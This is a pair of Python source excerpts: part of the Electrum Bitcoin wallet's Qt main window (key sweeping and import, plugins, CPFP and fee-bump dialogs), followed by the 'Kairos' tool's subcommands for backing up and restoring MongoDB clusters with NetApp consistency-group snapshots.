    hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    vbox.addLayout(hbox_top)
    keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
    keys_e.setTabChangesFocus(True)
    vbox.addWidget(keys_e)
    # fall back through address sources depending on wallet type
    addresses = self.wallet.get_unused_addresses()
    if not addresses:
        try:
            addresses = self.wallet.get_receiving_addresses()
        except AttributeError:
            addresses = self.wallet.get_addresses()
    h, address_e = address_field(addresses)
    vbox.addLayout(h)
    vbox.addStretch(1)
    button = OkButton(d, _('Sweep'))
    vbox.addLayout(Buttons(CancelButton(d), button))
    button.setEnabled(False)
    def get_address():
        # destination address, or None while the field is invalid
        addr = str(address_e.text()).strip()
        if bitcoin.is_address(addr):
            return addr
    def get_pk(*, raise_on_error=False):
        text = str(keys_e.toPlainText())
        return keystore.get_private_keys(text, raise_on_error=raise_on_error)
    def on_edit():
        # enable Sweep only when both keys and address validate
        valid_privkeys = False
        try:
            valid_privkeys = get_pk(raise_on_error=True) is not None
        except Exception as e:
            button.setToolTip(f'{_("Error")}: {repr(e)}')
        else:
            button.setToolTip('')
        button.setEnabled(get_address() is not None and valid_privkeys)
    on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
    keys_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_edit)
    address_e.textChanged.connect(on_address)
    on_address(str(address_e.text()))
    if not d.exec_():
        return
    # user pressed "sweep"
    addr = get_address()
    try:
        self.wallet.check_address_for_corruption(addr)
    except InternalAddressCorruption as e:
        self.show_error(str(e))
        raise
    privkeys = get_pk()
    def on_success(result):
        coins, keypairs = result
        # '!' means "send max": sweep the entire value to addr
        outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
        self.warn_if_watching_only()
        self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
    def on_failure(exc_info):
        self.on_error(exc_info)
    msg = _('Preparing sweep transaction...')
    task = lambda: self.network.run_from_another_thread(
        sweep_preparations(privkeys, self.network))
    WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
    """Common driver for importing addresses/keys pasted as text.

    *func(keys)* must return (good_inputs, bad_inputs) where bad_inputs is
    a list of (key, error_message) pairs. Results are summarized in message
    boxes (at most 10 entries shown each), then the lists are refreshed.
    """
    text = text_dialog(
        parent=self,
        title=title,
        header_layout=header_layout,
        ok_label=_('Import'),
        allow_multi=True,
        config=self.config,
    )
    if not text:
        return
    good_inputs, bad_inputs = func(str(text).split())
    if good_inputs:
        shown = '\n'.join(good_inputs[:10])
        if len(good_inputs) > 10:
            shown += '\n...'
        self.show_message(_("The following addresses were added")
                          + f' ({len(good_inputs)}):\n' + shown)
    if bad_inputs:
        shown = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
        if len(bad_inputs) > 10:
            shown += '\n...'
        self.show_error(_("The following inputs could not be imported")
                        + f' ({len(bad_inputs)}):\n' + shown)
    self.address_list.update()
    self.history_list.update()
def import_addresses(self):
    """Import watch-only addresses, if this wallet type supports it."""
    if not self.wallet.can_import_address():
        return
    self._do_import(_('Import addresses'),
                    _("Enter addresses") + ':',
                    self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
    """Import WIF private keys, if this wallet type supports it.

    @protected: password is supplied by the password prompt.
    """
    if not self.wallet.can_import_privkey():
        return
    header = QHBoxLayout()
    header.addWidget(QLabel(_("Enter private keys") + ':'))
    header.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    self._do_import(_('Import private keys'), header,
                    lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
    """Show/hide fiat amount fields based on FX state, then refresh views."""
    enabled = self.fx and self.fx.is_enabled()
    self.fiat_send_e.setVisible(enabled)
    self.fiat_receive_e.setVisible(enabled)
    self.history_list.update()
    self.address_list.refresh_headers()
    self.address_list.update()
    self.update_status()
def settings_dialog(self):
    """Open the preferences dialog and apply side effects when it closes.

    Triggers an FX rate refresh, notifies plugins, and warns if a restart
    is needed for the new GUI settings.
    """
    from .settings_dialog import SettingsDialog
    d = SettingsDialog(self, self.config)
    # let the dialog recolor its alias field while it is open
    self.alias_received_signal.connect(d.set_alias_color)
    d.exec_()
    self.alias_received_signal.disconnect(d.set_alias_color)
    if self.fx:
        self.fx.trigger_update()
    run_hook('close_settings_dialog')
    if d.need_restart:
        self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
    """Qt close handler.

    Runs clean_up() exactly once even if Qt delivers the event twice
    (observed in rare cases), then accepts the event.
    """
    first_time = not self.cleaned_up
    if first_time:
        self.cleaned_up = True
        self.clean_up()
    event.accept()
def clean_up(self):
    """Tear down the window: stop threads, persist UI state, close the wallet.

    Called exactly once from closeEvent(). Order matters: the wallet
    thread is stopped and callbacks unregistered before state is saved
    and the wallet is closed.
    """
    self.wallet.thread.stop()
    util.unregister_callback(self.on_network)
    self.config.set_key("is_maximized", self.isMaximized())
    if not self.isMaximized():
        # only persist geometry for a normal (restorable) window state
        g = self.geometry()
        self.wallet.db.put("winpos-qt", [g.left(),g.top(),
                                         g.width(),g.height()])
    # keep only the last 50 console entries
    self.wallet.db.put("qt-console-history", self.console.history[-50:])
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Dialog listing available plugins with enable checkboxes.

    Plugins that provide a settings widget get it added/removed next to
    their checkbox as they are toggled.
    """
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    settings_widgets = {}
    def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
        # keep the per-plugin settings widget in sync with enabled state
        widget = settings_widgets.get(name)  # type: Optional[QWidget]
        if widget and not p:
            # plugin got disabled, rm widget
            grid.removeWidget(widget)
            widget.setParent(None)
            settings_widgets.pop(name)
        elif widget is None and p and p.requires_settings() and p.is_enabled():
            # plugin got enabled, add widget
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
    def do_toggle(cb, name, i):
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
    # note: all enabled plugins will receive this hook:
    run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        if descr.get('registers_keystore'):
            # keystore-registering plugins are not listed in this dialog
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            # toggleable if it can be loaded, or is loaded and user-disableable
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # a broken plugin must not break the whole dialog
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
    """Show a Child-Pays-For-Parent dialog for *parent_tx*.

    Lets the user pick a child fee (via amount field or fee slider) and,
    on confirmation, builds and displays the child transaction.

    Fix: removed a stray apostrophe in the user-facing error message
    `_("Can't CPFP'")`, making it consistent with the "Can't CPFP:
    unknown fee" message above.
    """
    new_tx = self.wallet.cpfp(parent_tx, 0)  # fee=0 probe, used to size the child
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_txid = parent_tx.txid()
    assert parent_txid
    parent_fee = self.wallet.get_tx_fee(parent_txid)
    if parent_fee is None:
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    max_fee = new_tx.output_value()  # at most the whole child output can go to fees
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # recompute the derived labels whenever the child fee changes
        fee_for_child = fee_e.get_amount()
        if fee_for_child is None:
            return
        out_amt = max_fee - fee_for_child
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_for_child
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        # child pays for both transactions, minus what the parent already paid
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_combo = FeeComboBox(fee_slider)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(fee_combo, 4, 2)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    fee = fee_e.get_amount()
    if fee is None:
        return  # fee left empty, treat is as "cancel"
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    try:
        new_tx = self.wallet.cpfp(parent_tx, fee)
    except CannotCPFP as e:
        self.show_error(str(e))
        return
    self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
    """Populate *tx* with wallet/network metadata (mutates it in place).

    Returns True on success, False if the network lookup failed
    (an error dialog is shown in that case).
    """
    assert isinstance(tx, PartialTransaction)
    def populate():
        # may download input UTXOs over the network
        tx.add_info_from_wallet(self.wallet, ignore_network_issues=False)
    try:
        BlockingWaitingDialog(
            self,
            _("Adding info to tx, from wallet and network..."),
            populate,
        )
    except NetworkException as exc:
        self.show_error(repr(exc))
        return False
    return True
def bump_fee_dialog(self, tx: Transaction):
    """Open the fee-bump (RBF) dialog for *tx*."""
    txid = tx.txid()
    if not isinstance(tx, PartialTransaction):
        tx = PartialTransaction.from_tx(tx)
    # abort silently if wallet/network info could not be attached
    if self._add_info_to_tx_from_wallet_and_network(tx):
        BumpFeeDialog(main_window=self, tx=tx, txid=txid).run()
def dscancel_dialog(self, tx: Transaction):
    """Open the double-spend/cancel dialog for *tx*."""
    txid = tx.txid()
    if not isinstance(tx, PartialTransaction):
        tx = PartialTransaction.from_tx(tx)
    # abort silently if wallet/network info could not be attached
    if self._add_info_to_tx_from_wallet_and_network(tx):
        DSCancelDialog(main_window=self, tx=tx, txid=txid).run()
def save_transaction_into_wallet(self, tx: Transaction):
    """Persist an offline *tx* into the wallet history.

    Returns True on success; shows an error dialog and returns False
    when the transaction conflicts or cannot be added.
    """
    win = self.top_level_window()
    try:
        added = self.wallet.add_transaction(tx)
    except AddTransactionException as exc:
        win.show_error(exc)
        return False
    if not added:
        win.show_error(_("Transaction could not be saved.") + "\n" +
                       _("It conflicts with current history."))
        return False
    self.wallet.save_db()
    # need to update at least: history_list, utxo_list, address_list
    self.need_update.set()
    msg = (_("Transaction added to wallet history.") + '\n\n' +
           _("Note: this is an offline transaction, if you want the network "
             "to see it, you need to broadcast it."))
    win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
    return True
def show_cert_mismatch_error(self):
    """Warn about a --serverfingerprint mismatch and shut the window down.

    Guarded by a flag so re-entrant calls don't stack dialogs.
    """
    if self.showing_cert_mismatch_error:
        return
    self.showing_cert_mismatch_error = True
    warning = (_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.")
               + "\n\n" + _("Electrum will now exit."))
    self.show_critical(title=_("Certificate mismatch"), msg=warning)
    self.showing_cert_mismatch_error = False
    self.close()
|
subcmd.py | #!/usr/bin/env python2
import logging
import multiprocessing as mp
import multiprocessing.queues
import xml.dom.minidom
from arch_temp_data import ArchTempData
from datetime import datetime, timedelta
from host_conn import HostConn
from kairoslib.kairos_aptr import AppKairosAPTR
from mongodbcluster import MongoDBCluster
from ontap import ClusterSession, Snapshot, FlexClone, InitiatorGroup, Lun, Volume
from psutil import Process
from pymongo import MongoClient, errors
from recover_consumer import RecoverConsumer
from sys import exit
from time import sleep, time
class SubCmdMongodb:
    """CRUD helpers for MongoDB cluster entries in the Kairos repository.

    NOTE(review): modernized to Python 2.6+/3-compatible syntax
    (`except ... as e`, `str(e)` instead of the deprecated `e.message`).
    """

    def __init__(self, mdbcluster_spec=None):
        # drop keys the caller left unset; iterate over a copy because
        # we mutate the dict while scanning it (required on Python 3)
        if mdbcluster_spec is not None:
            for mdb_key in list(mdbcluster_spec.keys()):
                if mdbcluster_spec[mdb_key] is None:
                    mdbcluster_spec.pop(mdb_key)
        self.mdb_spec = mdbcluster_spec

    def add(self, kdb_session=None, kdb_collection=None):
        """Insert this cluster spec into the repository after a connectivity probe."""
        if type(self._testing_conn()) is not bool:
            logging.error('Cannot connect to MongoDB Cluster.')
            exit(1)
        else:
            try:
                collection = kdb_session[kdb_collection]
                collection.insert_one(self.mdb_spec)
            except errors.DuplicateKeyError as e:
                logging.error(str(e))
                exit(1)

    def remove(self, kdb_session=None, kdb_collection=None):
        """Delete the repository entry matching this spec's cluster name."""
        collection = kdb_session[kdb_collection]
        collection.delete_one({'cluster-name': self.mdb_spec['cluster-name']})

    @staticmethod
    def list(kdb_session=None, kdb_collection=None):
        """Return a cursor over all stored MongoDB clusters."""
        collection = kdb_session[kdb_collection]
        result = collection.find()
        return result

    def _testing_conn(self):
        """Return whether the URI connects; exit(1) on server-selection timeout."""
        try:
            mdbcluster = MongoClient(self.mdb_spec['mongodb-uri'])
            # is_mongos is a bool on a live connection; anything else means failure
            return isinstance(mdbcluster.is_mongos, bool)
        except errors.ServerSelectionTimeoutError as e:
            logging.error(str(e))
            exit(1)
class SubCmdNetapp:
    """CRUD helpers for NetApp system entries in the Kairos repository."""

    def __init__(self, ntapsys_spec=None):
        # drop keys the caller left unset; iterate over a copy because
        # we mutate the dict while scanning it (required on Python 3)
        if ntapsys_spec is not None:
            for ntapsys_key in list(ntapsys_spec.keys()):
                if ntapsys_spec[ntapsys_key] is None:
                    ntapsys_spec.pop(ntapsys_key)
        self.netappsys = ntapsys_spec

    def add(self, kdb_session, kdb_collection):
        """Probe the NetApp system and, if reachable, store its spec."""
        verify_netapp = self._testing_conn()
        if type(verify_netapp) is tuple:
            # BUGFIX: was `self.ndp_spec` -- a nonexistent attribute that
            # raised AttributeError on the error path instead of logging.
            logging.error('Failed to connect to ' + self.netappsys['netapp-ip'])
            exit(1)
        elif (type(verify_netapp) is list) or (type(verify_netapp) is str):
            collection = kdb_session[kdb_collection]
            try:
                collection.insert_one(self.netappsys)
                logging.info('NetApp system ' + self.netappsys['netapp-ip'] + ' has been added to the database.')
            except errors.DuplicateKeyError as e:
                logging.error(str(e))
                exit(1)

    def remove(self, kdb_session, kdb_collection):
        """Delete the entry matching this system's IP; return the deleted count."""
        collection = kdb_session[kdb_collection]
        try:
            result = collection.delete_one({'netapp-ip': self.netappsys['netapp-ip']}).deleted_count
            return result
        except errors.PyMongoError as e:
            # BUGFIX: `except errors, e:` tried to catch the pymongo.errors
            # *module*, which can never match; catch the pymongo base class.
            logging.error(str(e))
            exit(1)

    def list(self, kdb_session, kdb_collection):
        """Return a cursor over all stored NetApp systems."""
        collection = kdb_session[kdb_collection]
        result = collection.find()
        return result

    def _testing_conn(self):
        """Open a cluster- or SVM-scoped session depending on the spec and
        return the node/vserver query result (tuple signals failure upstream)."""
        if 'svm-name' not in self.netappsys:
            ns = ClusterSession(self.netappsys['netapp-ip'], self.netappsys['username'], self.netappsys['password'])
            return ns.get_nodes()
        else:
            ns = ClusterSession(self.netappsys['netapp-ip'], self.netappsys['username'], self.netappsys['password'],
                                self.netappsys['svm-name'])
            return ns.get_vserver()
class SubCmdBackup:
    """Create, delete and query storage-level (NetApp CG snapshot) backups
    of a MongoDB replica set or sharded cluster."""

    def __init__(self, bkp_spec=None):
        if bkp_spec is not None:
            self.backup = bkp_spec

    @staticmethod
    def _data_bearing(member):
        """True for members that hold data (PRIMARY/SECONDARY, not arbiters)."""
        return member['stateStr'] == 'PRIMARY' or member['stateStr'] == 'SECONDARY'

    def _collect_storage_info(self, members, mongod_conf, label):
        """Attach each data-bearing member's storage layout, queried over SSH."""
        for member in members:
            if self._data_bearing(member):
                host = HostConn(ipaddr=member['name'].split(':')[0], username=self.backup['username'])
                member['storage_info'] = host.get_storage_layout(mongod_conf)
                host.close()
                logging.info('Collecting info about {} {}'.format(label, member['name'].split(':')[0]))

    def _build_cg_spec(self, member):
        """Build the consistency-group snapshot spec for one data-bearing member."""
        per_server_cg = dict()
        per_server_cg['volume'] = list()
        per_server_cg['snapname'] = self.backup['backup-name']
        per_server_cg['snap-type'] = 'cgsnap'
        per_server_cg['cg-timeout'] = 'relaxed'
        per_server_cg['member_name'] = member['name'].split(':')[0]
        for volume in member['storage_info']['volume_topology']:
            per_server_cg['volume'].append(volume['volume'])
            # NOTE(review): assumes all of a member's volumes live on one SVM
            # (last one wins) -- confirm against get_storage_layout()
            per_server_cg['svm-name'] = volume['svm-name']
        return per_server_cg

    @staticmethod
    def _collect_volumes(members, volume_map):
        """Group every data-bearing member's volumes by owning SVM into volume_map."""
        for member in members:
            if member['stateStr'] == 'PRIMARY' or member['stateStr'] == 'SECONDARY':
                for vol in member['storage_info']['volume_topology']:
                    if vol['svm-name'] not in volume_map:
                        volume_map[vol['svm-name']] = list()
                    volume_map[vol['svm-name']].append(vol['volume'])

    def create(self, kdb_session):
        """Take a CG snapshot backup of the cluster and record its metadata."""
        try:
            kdb_mdbclusters = kdb_session['mdbclusters']
            cluster_info = kdb_mdbclusters.find_one({'cluster-name': self.backup['cluster-name']})
            if cluster_info is None:
                logging.error('MongoDB cluster ' + self.backup['cluster-name'] + ' not found.')
                exit(1)
            logging.info('Found ' + self.backup['cluster-name'] + ' on Kairos repository.')
        except (errors.ConnectionFailure, errors.CursorNotFound) as e:
            # BUGFIX: `except A or B, e:` only ever caught ConnectionFailure;
            # a tuple catches both exception types.
            logging.error(str(e))
            exit(1)
        if cluster_info['mongodb-auth'] == 'off':
            mdbcluster = MongoDBCluster(cluster_info['mongodb-uri'])
        else:
            # TODO: authenticated clusters are not implemented; previously this
            # fell through and crashed later with a NameError on `mdbcluster`.
            logging.error('MongoDB clusters with authentication enabled are not supported yet.')
            exit(1)
        # -- backup metadata data structure
        bkp_metadata = dict()
        # -- Getting MongoDB cluster topology
        topology = mdbcluster.get_topology()
        logging.info(self.backup['cluster-name'] + ' is a ' + topology['cluster_type'] + ' cluster.')
        mongod_conf = cluster_info['mongodb-mongod-conf']
        if topology['cluster_type'] == 'replSet':
            self._collect_storage_info(topology['members'], mongod_conf, 'host')
        elif topology['cluster_type'] == 'sharded':
            self._collect_storage_info(topology['config_servers'], mongod_conf, 'config server')
            for shard_replset in topology['shards']:
                self._collect_storage_info(shard_replset['shard_members'], mongod_conf, 'shard member')
        # -- One CG snapshot spec per data-bearing member
        snapshot_list = list()
        if topology['cluster_type'] == 'replSet':
            for rs_member in topology['members']:
                if self._data_bearing(rs_member):
                    snapshot_list.append(self._build_cg_spec(rs_member))
        elif topology['cluster_type'] == 'sharded':
            for cs_member in topology['config_servers']:
                if self._data_bearing(cs_member):
                    snapshot_list.append(self._build_cg_spec(cs_member))
            for shard_replset in topology['shards']:
                for shard_member in shard_replset['shard_members']:
                    if self._data_bearing(shard_member):
                        snapshot_list.append(self._build_cg_spec(shard_member))
        # -- If sharded cluster, stopping the balancer before taking any snapshot
        if topology['cluster_type'] == 'sharded':
            mdbcluster.stop_balancer()
        # -- Creating CG snapshots
        # -- -- Connecting to kairos_repo to get the storage credentials
        kdb_netapp = kdb_session['ntapsystems']
        for cgsnapshot in snapshot_list:
            svm_info = kdb_netapp.find_one({'svm-name': cgsnapshot['svm-name']})
            cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'], svm_info['svm-name'])
            cgsnap = Snapshot(cgsnapshot)
            result = cgsnap.cgcreate(cs_svm)
            if result[0] == 'passed':
                logging.info('CG Snapshot of member {} has been successfully taken.'.format(cgsnapshot['member_name']))
            else:
                #TODO: Rollback backup operation by deleting other volumes snapshots
                logging.error('CG Snapshot of member {} has failed.'.format(cgsnapshot['member_name']))
                logging.error(result[1])
                if topology['cluster_type'] == 'sharded':
                    mdbcluster.start_balancer()
                exit(1)
        # -- If sharded cluster, starting the balancer after taking a snapshot
        if topology['cluster_type'] == 'sharded':
            mdbcluster.start_balancer()
        # -- Saving backup metadata to the repository database
        bkp_metadata['created_at'] = datetime.now()
        bkp_metadata['backup_name'] = self.backup['backup-name']
        bkp_metadata['cluster_name'] = self.backup['cluster-name']
        bkp_metadata['mongo_topology'] = topology
        bkp_metadata['retention'] = self._calc_retention(self.backup['retention'], bkp_metadata['created_at'])
        kdb_backups = kdb_session['backups']
        kdb_backups.insert_one(bkp_metadata)

    def delete(self, kdb_session):
        """Delete a backup's snapshots on every volume, then its catalog entry."""
        kdb_bkps = kdb_session['backups']
        bkp2delete = kdb_bkps.find_one({'backup_name': self.backup['backup-name']})
        if bkp2delete is None:
            logging.error('Backup ' + self.backup['backup-name'] + ' not found.')
            exit(1)
        delete_list = dict()
        topology = bkp2delete['mongo_topology']
        if topology['cluster_type'] == 'replSet':
            self._collect_volumes(topology['members'], delete_list)
        elif topology['cluster_type'] == 'sharded':
            self._collect_volumes(topology['config_servers'], delete_list)
            for shard_replset in topology['shards']:
                self._collect_volumes(shard_replset['shard_members'], delete_list)
        # -- Checking if the snapshot is ready to be deleted across all volumes
        kdb_netapp = kdb_session['ntapsystems']
        for svm in delete_list.keys():
            svm_info = kdb_netapp.find_one({'svm-name': svm})
            cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'],
                                    svm_info['svm-name'])
            for volume in delete_list[svm]:
                snapspec = dict()
                snapspec['volume'] = volume
                snapspec['snapname'] = bkp2delete['backup_name']
                snapshot = Snapshot(snapspec)
                result_getsnap = snapshot.get_snaps(cs_svm)
                if result_getsnap[0] == 'passed':
                    xmloutput = xml.dom.minidom.parseString(result_getsnap[1])
                    snap_busy = xmloutput.getElementsByTagName('busy')[0].firstChild.data
                    if snap_busy == 'false':
                        logging.info('Snapshot ' + snapspec['snapname'] + ' from volume ' + snapspec['volume'] +
                                     ' passed the inspection to be deleted.')
                    else:
                        logging.error('Snapshot ' + snapspec['snapname'] + ' from volume ' + snapspec['volume'] +
                                      ' is busy and cannot be deleted.')
                        exit(1)
        # -- Deleting snapshot across all volumes
        for svm in delete_list.keys():
            svm_info = kdb_netapp.find_one({'svm-name': svm})
            cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'],
                                    svm_info['svm-name'])
            for volume in delete_list[svm]:
                snapspec = dict()
                snapspec['volume'] = volume
                snapspec['snapname'] = bkp2delete['backup_name']
                snapshot = Snapshot(snapspec)
                delete_result = snapshot.delete(cs_svm)
                if delete_result[0] == 'passed':
                    logging.info('Snapshot ' + snapspec['snapname'] + ' has been deleted from volume ' + snapspec['volume'])
                else:
                    logging.error('Failed to delete snapshot ' + snapspec['snapname'] + ' on volume ' + snapspec['volume'] + '.')
        kdb_bkps.delete_one({'backup_name': self.backup['backup-name']})

    def list_all(self, kdb_session):
        """Print every backup with its creation and expiry timestamps."""
        kdb_bkps = kdb_session['backups']
        result = kdb_bkps.find()
        # parenthesized print works on both Python 2 and 3
        print('{:30} \t {:30} {:30}'.format('Backup Name', 'Created At', 'Expires At'))
        for bkp in result:
            print('{:30} \t {:30} {:30}'.format(bkp['backup_name'], bkp['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'),
                                                bkp['retention'].strftime('%Y-%m-%d %H:%M:%S.%f')))

    def search_for_db(self, kdb_session, keyword):
        """Print backups whose sharded topology contains database *keyword*."""
        kdb_bkps = kdb_session['backups']
        key_search = 'mongo_topology.shards.databases.' + keyword
        result = kdb_bkps.find({key_search: {'$exists': True}})
        print('{:30} \t {:30} {:30}'.format('Backup Name', 'Created At', 'Retention'))
        for bkp in result:
            print('{:30} \t {:30} {:30}'.format(bkp['backup_name'],
                                                bkp['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'),
                                                bkp['retention'].strftime('%Y-%m-%d %H:%M:%S.%f')))

    def search_for_collection(self, kdb_session, database, collection):
        """Print backups whose *database* entry matches *collection*."""
        kdb_bkps = kdb_session['backups']
        key_search = 'mongo_topology.shards.databases.' + database
        result = kdb_bkps.find({key_search: collection})
        print('{:30} \t {:30} {:30}'.format('Backup Name', 'Created At', 'Retention'))
        for bkp in result:
            print('{:30} \t {:30} {:30}'.format(bkp['backup_name'],
                                                bkp['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'),
                                                bkp['retention'].strftime('%Y-%m-%d %H:%M:%S.%f')))

    def _calc_retention(self, retention, created_at):
        """Translate a retention string like '30m'/'2h'/'7d'/'1w' into an
        absolute expiry datetime. Returns None for an unknown unit suffix."""
        unit = retention[len(retention) - 1:]
        value = retention[:-1]
        if unit == 'm':
            return created_at + timedelta(minutes=int(value))
        elif unit == 'h':
            return created_at + timedelta(hours=int(value))
        elif unit == 'd':
            return created_at + timedelta(days=int(value))
        elif unit == 'w':
            return created_at + timedelta(weeks=int(value))
class SubCmdRestore:
    """Restore a storage-level backup onto a MongoDB cluster.

    The three near-identical per-member sequences of the original (replica-set
    members, config servers, shard members) are factored into
    _quiesce_member / _resume_member / _collect_volumes.
    """

    def __init__(self, rst_spec=None):
        self.backup_name = rst_spec['backup-name']
        self.cluster_name = rst_spec['cluster-name']
        self.username = rst_spec['username']
        self.archive_repo_uri = rst_spec['archive_repo_uri']
        self.archive_repo_name = rst_spec['archive_repo_name']

    @staticmethod
    def _collect_volumes(members, volume_map):
        """Group every data-bearing member's volumes by owning SVM into volume_map."""
        for member in members:
            if member['stateStr'] == 'PRIMARY' or member['stateStr'] == 'SECONDARY':
                for vol in member['storage_info']['volume_topology']:
                    if vol['svm-name'] not in volume_map:
                        volume_map[vol['svm-name']] = list()
                    volume_map[vol['svm-name']].append(vol['volume'])

    def _quiesce_member(self, member):
        """Stop mongod on *member*; on data-bearing nodes also unmount the FS,
        deactivate the LVM volume group and stop multipathd. Exits on failure."""
        member_ip = member['name'].split(':')[0]
        host = HostConn(ipaddr=member_ip, username=self.username)
        # -- Stopping mongod (on every member, arbiters included)
        stop_mongo = host.stop_service('mongod')
        if stop_mongo[1] != 0:
            logging.error('Cannot stop MongoDB on host {}.'.format(member_ip))
            exit(1)
        else:
            logging.info('MongoDB has been stopped on host {}.'.format(member_ip))
        # -- For every data bearing node: umount, vgchange and multipath stop
        if member['stateStr'] == 'PRIMARY' or member['stateStr'] == 'SECONDARY':
            umount_fs = host.umount_fs(fs_mountpoint=member['storage_info']['mountpoint'])
            if umount_fs[1] != 0:
                logging.error('Cannot unmount MongoDB file system {}.'.format(member['storage_info']['mountpoint']))
                exit(1)
            else:
                logging.info('MongoDB file system {} has been successfully unmounted.'.format(member['storage_info']['mountpoint']))
